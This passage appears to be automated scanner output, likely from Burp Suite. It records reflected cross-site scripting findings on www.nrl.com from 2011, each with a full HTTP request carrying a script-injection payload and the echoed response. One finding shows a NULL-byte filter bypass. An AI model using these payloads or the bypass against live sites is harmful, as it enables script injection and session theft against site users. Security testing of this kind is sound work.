Path:	/News/BillHarrigan/tabid/11005/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc46"><script>alert(1)</script>9cc74303f51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/BillHarrigan/tabid/11005/Default.aspx?ebc46"><script>alert(1)</script>9cc74303f51=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:46:59 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 88174
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/billharrigan/tabid/11005/ebc46"><script>alert(1)</script>9cc74303f51/1/pageindex114569/1/default.aspx">
...[SNIP]...

1.293. http://www.nrl.com/News/GrahamMurray/tabid/11006/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/GrahamMurray/tabid/11006/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a775c"><script>alert(1)</script>cd65c497526 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/GrahamMurray/tabid/11006/Default.aspx?a775c"><script>alert(1)</script>cd65c497526=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:46:53 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87970
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/grahammurray/tabid/11006/a775c"><script>alert(1)</script>cd65c497526/1/pageindex114572/1/default.aspx">
...[SNIP]...

1.294. http://www.nrl.com/News/LeilaMcKinnon/tabid/11007/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/LeilaMcKinnon/tabid/11007/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0432"><script>alert(1)</script>d5d1c6a293b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/LeilaMcKinnon/tabid/11007/Default.aspx?b0432"><script>alert(1)</script>d5d1c6a293b=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:47:33 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87923
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/leilamckinnon/tabid/11007/b0432"><script>alert(1)</script>d5d1c6a293b/1/pageindex114575/1/default.aspx">
...[SNIP]...

1.295. http://www.nrl.com/News/LiveChat/tabid/11049/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/LiveChat/tabid/11049/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea999"><script>alert(1)</script>ea5aabdd225 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/LiveChat/tabid/11049/Default.aspx?ea999"><script>alert(1)</script>ea5aabdd225=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:46:15 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84737
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/livechat/tabid/11049/ea999"><script>alert(1)</script>ea5aabdd225/1/pageindex114765/1/default.aspx">
...[SNIP]...

1.296. http://www.nrl.com/News/MattRussell/tabid/11008/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/MattRussell/tabid/11008/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002c7a6"><script>alert(1)</script>fa41a5c3150 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c7a6"><script>alert(1)</script>fa41a5c3150 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /News/MattRussell/tabid/11008/Default.aspx?%002c7a6"><script>alert(1)</script>fa41a5c3150=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:49:20 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87695
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/mattrussell/tabid/11008/%002c7a6"><script>alert(1)</script>fa41a5c3150/1/pageindex114578/1/default.aspx">
...[SNIP]...

1.297. http://www.nrl.com/News/Moments/tabid/11042/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/Moments/tabid/11042/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f7a1"><script>alert(1)</script>056a9785b06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/Moments/tabid/11042/Default.aspx?7f7a1"><script>alert(1)</script>056a9785b06=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:47:36 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86656
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/moments/tabid/11042/7f7a1"><script>alert(1)</script>056a9785b06/1/pageindex114709/1/default.aspx">
...[SNIP]...

1.298. http://www.nrl.com/News/PeterSterling/tabid/10993/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/PeterSterling/tabid/10993/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14b12"><script>alert(1)</script>2d9f65ab687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/PeterSterling/tabid/10993/Default.aspx?14b12"><script>alert(1)</script>2d9f65ab687=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:46:14 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86819
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/petersterling/tabid/10993/14b12"><script>alert(1)</script>2d9f65ab687/1/pageindex114526/1/default.aspx">
...[SNIP]...

1.299. http://www.nrl.com/News/StatsInsider/tabid/11041/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/StatsInsider/tabid/11041/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51781"><script>alert(1)</script>af7eb33869f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/StatsInsider/tabid/11041/Default.aspx?51781"><script>alert(1)</script>af7eb33869f=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:46:55 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87135
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/statsinsider/tabid/11041/51781"><script>alert(1)</script>af7eb33869f/1/pageindex114708/1/default.aspx">
...[SNIP]...

1.300. http://www.nrl.com/News/TrentBarrett/tabid/11009/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/TrentBarrett/tabid/11009/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3000a"><script>alert(1)</script>a3e3f1d009e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/TrentBarrett/tabid/11009/Default.aspx?3000a"><script>alert(1)</script>a3e3f1d009e=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:47:17 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 88202
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/trentbarrett/tabid/11009/3000a"><script>alert(1)</script>a3e3f1d009e/1/pageindex114581/1/default.aspx">
...[SNIP]...

1.301. http://www.nrl.com/News/WhereAreTheyNow/tabid/11044/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/News/WhereAreTheyNow/tabid/11044/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b15b0"><script>alert(1)</script>f919709985f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /News/WhereAreTheyNow/tabid/11044/Default.aspx?b15b0"><script>alert(1)</script>f919709985f=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:46:57 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 86671
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/news/wherearetheynow/tabid/11044/b15b0"><script>alert(1)</script>f919709985f/1/pageindex114711/1/default.aspx">
...[SNIP]...

1.302. http://www.nrl.com/TelstraPremiership/2011Draw/tabid/10978/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/TelstraPremiership/2011Draw/tabid/10978/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3439f"><script>alert(1)</script>2cc6a2d0192 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TelstraPremiership/2011Draw/tabid/10978/Default.aspx?3439f"><script>alert(1)</script>2cc6a2d0192=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:39:23 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 90529
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/2011draw/tabid/10978/3439f"><script>alert(1)</script>2cc6a2d0192/1/round/180/default.aspx">
...[SNIP]...

1.303. http://www.nrl.com/TelstraPremiership/CasualtyWard/tabid/10247/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/TelstraPremiership/CasualtyWard/tabid/10247/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33e45"><script>alert(1)</script>ec5fd06d9d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TelstraPremiership/CasualtyWard/tabid/10247/Default.aspx?33e45"><script>alert(1)</script>ec5fd06d9d1=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:39:54 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 114030
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/TelstraPremiership/CasualtyWard/tabid/10247/Default.aspx?33e45"><script>alert(1)</script>ec5fd06d9d1=1#BRI">
...[SNIP]...

1.304. http://www.nrl.com/Video/2011GameAnalyser/tabid/10910/Default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/Video/2011GameAnalyser/tabid/10910/Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a25b9"-alert(1)-"515674b75a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Video/2011GameAnalyser/tabid/10910/Default.aspx?a25b9"-alert(1)-"515674b75a9=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:50:06 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79162
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
Premiership&omnitureProp5=TelstraPremiershipGameAnalyser&omnitureEventPrefix=BP-NRL-TPGameAnalyser-&displayBySeason=0&currentlocation=http://www.nrl.com/Video/2011GameAnalyser/tabid/10910/Default.aspx?a25b9"-alert(1)-"515674b75a9=1";
swfURL += location.search;
so = new SWFObject(swfURL, "flashMovie", "990", "560", "9", "#FFFFFF");
so.addVariable("id", "flashMovie");
so.addParam("scale", "noscale");
so.addParam("wmode", "transp
...[SNIP]...

1.305. http://www.nrl.com/telstrapremiership/gameanalyservideo/tabid/10910/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/gameanalyservideo/tabid/10910/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 331ff"-alert(1)-"4c50c00411f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /telstrapremiership/gameanalyservideo/tabid/10910/default.aspx?331ff"-alert(1)-"4c50c00411f=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:44:02 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79174
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
nitureProp5=TelstraPremiershipGameAnalyser&omnitureEventPrefix=BP-NRL-TPGameAnalyser-&displayBySeason=0&currentlocation=http://www.nrl.com/telstrapremiership/gameanalyservideo/tabid/10910/default.aspx?331ff"-alert(1)-"4c50c00411f=1";
swfURL += location.search;
so = new SWFObject(swfURL, "flashMovie", "990", "560", "9", "#FFFFFF");
so.addVariable("id", "flashMovie");
so.addParam("scale", "noscale");
so.addParam("wmode", "transp
...[SNIP]...

1.306. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/228/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/228/seasonid/7/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5b1e"><script>alert(1)</script>aed710b93dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/228/seasonid/7/default.aspx?c5b1e"><script>alert(1)</script>aed710b93dc=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:41:47 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 142394
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/playerstats/playerprofile/tabid/10898/c5b1e"><script>alert(1)</script>aed710b93dc/1/clubid/1/seasonid/7/default.aspx">
...[SNIP]...

1.307. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/692/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/692/seasonid/7/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77ab1"><script>alert(1)</script>df5f08a968f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/11/playerid/692/seasonid/7/default.aspx?77ab1"><script>alert(1)</script>df5f08a968f=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:41:47 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 142331
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/playerstats/playerprofile/tabid/10898/77ab1"><script>alert(1)</script>df5f08a968f/1/clubid/1/seasonid/7/default.aspx">
...[SNIP]...

1.308. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/14/playerid/752/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/14/playerid/752/seasonid/7/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e30b"><script>alert(1)</script>245e07c4c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/14/playerid/752/seasonid/7/default.aspx?3e30b"><script>alert(1)</script>245e07c4c01=1 HTTP/1.1
Host: www.nrl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 04 Oct 2011 21:46:50 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 146451
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<a href="/telstrapremiership/playerstats/playerprofile/tabid/10898/3e30b"><script>alert(1)</script>245e07c4c01/1/clubid/1/seasonid/7/default.aspx">
...[SNIP]...

1.309. http://www.nrl.com/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/15/playerid/210/seasonid/7/default.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nrl.com
Path:	/telstrapremiership/playerstats/playerprofile/tabid/10898/clubid/15/playerid/210/seasonid/7/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ae46"><script>alert(1)</script>7e445c4e218 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

